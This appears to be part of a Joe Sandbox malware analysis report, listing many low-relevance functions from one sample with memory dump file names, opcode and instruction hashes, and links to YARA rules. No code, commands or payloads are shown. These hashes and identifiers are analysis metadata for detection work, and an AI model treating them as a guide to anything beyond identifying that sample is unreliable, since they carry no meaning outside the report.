                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 997e46fa17f3d52168dd1cc2b166d1ff632b7614bed6633ad8756271684bebe6
                                                                                                                                                                                                                                                                                            • Instruction ID: 7259240fff6e0633ff584793f01f5f979c49a90e0d08d4935b07f77665da7eda
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 997e46fa17f3d52168dd1cc2b166d1ff632b7614bed6633ad8756271684bebe6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8521FF4810D2E049CB178B3540A45A2BFE25DAB10E77ED4DED4D80E2A7D15BC54BD736
                                                                                                                                                                                                                                                                                            Function 0041A251 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 508d5a2ce248ca8a74def9dc625d13621474c105ea40d2ba1c1f937684114908
                                                                                                                                                                                                                                                                                            • Instruction ID: 94ac3df403e8c80454cdca80308e0056c9a97f5e03f410a5469b3c5fd3b99a2c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 508d5a2ce248ca8a74def9dc625d13621474c105ea40d2ba1c1f937684114908
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6721304800D2E059CB17473540A45A2BFE25DAF00E76ED1DED4D80E3A7C1ABC55BEB36
                                                                                                                                                                                                                                                                                            Function 0041B5F1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: f9353e05ecc959e5482c9af0e4f5d4f284edab255ded7d9fe93ab3dd1ea0bef0
                                                                                                                                                                                                                                                                                            • Instruction ID: 63557ff1be7e97d1404505569aff9f03a3f0fd0b8eaeafb8486e60701c829e26
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9353e05ecc959e5482c9af0e4f5d4f284edab255ded7d9fe93ab3dd1ea0bef0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F021004800D2E049CB1B4B3540A45A2BFE25DAB10D77ED0DED4D80E3A7D15BC54BE736
                                                                                                                                                                                                                                                                                            Function 004195B1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 99b2c458c0985b66e60eddc8f6089541392aa2720482ab43d9ea71506b224d60
                                                                                                                                                                                                                                                                                            • Instruction ID: db32eb8ab536e095372ab82089e501a12f9f6ef8f99d5fa75ef22ae8c04a00b3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99b2c458c0985b66e60eddc8f6089541392aa2720482ab43d9ea71506b224d60
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E221FD4800D2E049CB17873540A45A2BFE25DAB00E77ED5DED4D80E2A7D1ABC64BEB36
                                                                                                                                                                                                                                                                                            Function 00431631 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 8451569efa06806e3296ebf7bbfb111781d49964400eae7d91bb155d28116c3a
                                                                                                                                                                                                                                                                                            • Instruction ID: 179495529a9d65da5c2a86300bbd69a82bba2ec8913f68a16a6cd7064bf4a344
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8451569efa06806e3296ebf7bbfb111781d49964400eae7d91bb155d28116c3a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0210F4800D2E049CB17873540A45A2BFE25DAF00E76ED1DDD4D80E3A7D16BC65BEB36
                                                                                                                                                                                                                                                                                            Function 004206D1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 8f93a6eb2fa6fb4b7f602ac3f505af057ddd608803c8a0c03ff4fa83bbd7bf70
                                                                                                                                                                                                                                                                                            • Instruction ID: ed2698506747ab7b66a9de06e77f0ebfc43bff7485b51405097c7c1ad72bbf9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f93a6eb2fa6fb4b7f602ac3f505af057ddd608803c8a0c03ff4fa83bbd7bf70
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C521FD4800D2E059CB17873540A49A2BFE25DAF10E76ED1DED4D80E3A7D1ABC54BEB36
                                                                                                                                                                                                                                                                                            Function 0042E741 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: cf807f06ae80321b34c97c9f35aa2c441cded84b0a5297b6fbf8cbc0cb0cfe9a
                                                                                                                                                                                                                                                                                            • Instruction ID: 4cdf6b9d05abec45244d085755c90436f241c6854d9689a473ece39be2cd5304
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf807f06ae80321b34c97c9f35aa2c441cded84b0a5297b6fbf8cbc0cb0cfe9a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3921244800D2E058C717873540A55A2BFE25DAF00E76ED2DDE4DC0E3A7D26BC65BDB26
                                                                                                                                                                                                                                                                                            Function 0042FEA1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 964ad01d02f62de679869352fdf8adfa3ab4f3e9ebabdca677ed2e4b1e0f397d
                                                                                                                                                                                                                                                                                            • Instruction ID: 70bceb964744bc3e8e78957cd649882c9c4bc65eb5500e6cfc291fdfa8718356
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964ad01d02f62de679869352fdf8adfa3ab4f3e9ebabdca677ed2e4b1e0f397d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B21104800D2E049CB17873540A45A2BFE29DAF00E76ED5DED4D80E3A7D16BC65BEB26
                                                                                                                                                                                                                                                                                            Function 00436EA2 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0d6ae9f52c151d7e46e201c8a2b222f6b9db5f53bcb09f8bd4f9de897f8c1940
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ef46fb17154aacb09a9c7cc4bb11225e5f003e3a0e6954a29689fbc8bca245e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d6ae9f52c151d7e46e201c8a2b222f6b9db5f53bcb09f8bd4f9de897f8c1940
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32118614EE51B12EC2416E3C84D45F27B90DABF1177FD5789C988A7243C2099227CF51
                                                                                                                                                                                                                                                                                            Function 0041A1B1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: c79e1d8106f904f7df49fd4f712810d7d7d3a9f7c717eecf0423a734cdc98292
                                                                                                                                                                                                                                                                                            • Instruction ID: b45ad694226473e28e257d36f9f5193a10a1c6a0d277d067d9a28a3b76f6b221
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c79e1d8106f904f7df49fd4f712810d7d7d3a9f7c717eecf0423a734cdc98292
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB211D4800D2E048CB1B8B3540A45A2BFE25DAB10D77ED0CED4D80E3A7D1ABC54BEB36
                                                                                                                                                                                                                                                                                            Function 00424341 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: ce959d9d0804bea07dfbe4a8f05d2ab394b03a77712db5bf2bea4ccbcb255dc8
                                                                                                                                                                                                                                                                                            • Instruction ID: 3fc0df7335d3567a1b9d9569d5b90c796fca7dcc28d2cb6c0495ebe4ad04efc5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce959d9d0804bea07dfbe4a8f05d2ab394b03a77712db5bf2bea4ccbcb255dc8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB21238800D2E058CB17873540A45A2BFE25DAF00E76ED1CDD4D80E3A7D1ABC65BEB36
                                                                                                                                                                                                                                                                                            Function 0042F3F1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: cf8e638c34602b33f9aaa462e57cc805fd6916fadd4b46beb280692ef532fd44
                                                                                                                                                                                                                                                                                            • Instruction ID: 426d7385027130855e9c0d29d3fc2e1992a82f73fc45b303ef57789e2334202d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf8e638c34602b33f9aaa462e57cc805fd6916fadd4b46beb280692ef532fd44
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F421435800D2E048C717873540A45A2BFE29DAF00E76ED1CED4DC0E3A7D26BC65BEB22
                                                                                                                                                                                                                                                                                            Function 00431381 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: fef3b03f71d611f024134fd5af84b5379f47dd04fc3f5f639f4658377fff8a4d
                                                                                                                                                                                                                                                                                            • Instruction ID: ed2c3c939569aa985fc9530a994d03ca05a86620880be07b310b2bf68faee964
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fef3b03f71d611f024134fd5af84b5379f47dd04fc3f5f639f4658377fff8a4d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7621465800D2E048CB17873540A45A2BFE25DAF00E76ED1CDD4D80E3A7D15BC65BDB32
                                                                                                                                                                                                                                                                                            Function 0041A631 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: a423f5c839748a9314cedc4561f4d1cb5dd61ed28f5f27dea349a2d3b3e339c0
                                                                                                                                                                                                                                                                                            • Instruction ID: fce169281928a9aa8976c992d5076d668f154c48944e7d91ba1d46ac01ff7aed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a423f5c839748a9314cedc4561f4d1cb5dd61ed28f5f27dea349a2d3b3e339c0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC211E4800D2E049CB1B873541A45A2BFE25DAB00976ED0CED4D80E3A7D19BC54BEB36
                                                                                                                                                                                                                                                                                            Function 0041AAD1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 4598e05018833f8f30f3eda2320888bd91536d461141f259b2bde7ecddf3691e
                                                                                                                                                                                                                                                                                            • Instruction ID: aa70ec595128001fb1250e99e6eb4a390c886770488e45dff19abf4b8beaf692
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4598e05018833f8f30f3eda2320888bd91536d461141f259b2bde7ecddf3691e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C211D4800D2E058CB1B8B3540A45A2BFE25DAB10D77ED4CED4D80E7A7D1ABC54BE736
                                                                                                                                                                                                                                                                                            Function 0041AD91 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
